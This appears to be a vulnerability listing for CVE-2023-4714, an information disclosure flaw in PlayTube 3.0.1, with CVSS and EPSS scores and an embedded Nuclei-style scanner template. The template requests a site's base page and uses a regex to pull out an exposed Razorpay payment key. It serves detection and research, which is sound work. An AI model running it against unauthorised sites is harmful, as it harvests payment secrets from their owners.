4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.605 Medium
EPSS
Percentile
97.8%
A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
id: CVE-2023-4714
info:
name: PlayTube 3.0.1 - Information Disclosure
author: Farish
severity: high
description: |
A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
impact: |
An attacker can exploit this vulnerability to gain access to sensitive information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4714
- https://www.exploitalert.com/view-details.html?id=39826
- https://vuldb.com/?ctiid.238577
- https://vuldb.com/?id.238577
- https://github.com/Threekiii/Awesome-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-4714
cwe-id: CWE-200
epss-score: 0.68074
epss-percentile: 0.97962
cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: playtube
product: playtube
tags: cve2023,cve,playtube,exposure
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "razorpay_options"
- "PlayTube"
- "key:"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'key: "([a-z_A-Z0-9]+)"'
# digest: 4a0a00473045022100c49434d3219e961bf9b3a2986f638e7217defeb346998ca398332577bb611a360220485c16c30e0970e454110ae41a21d5031534d48c954adceb05a6f5f92ba5f568:922c64590222798bb761d5b6d8e72950
4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.605 Medium
EPSS
Percentile
97.8%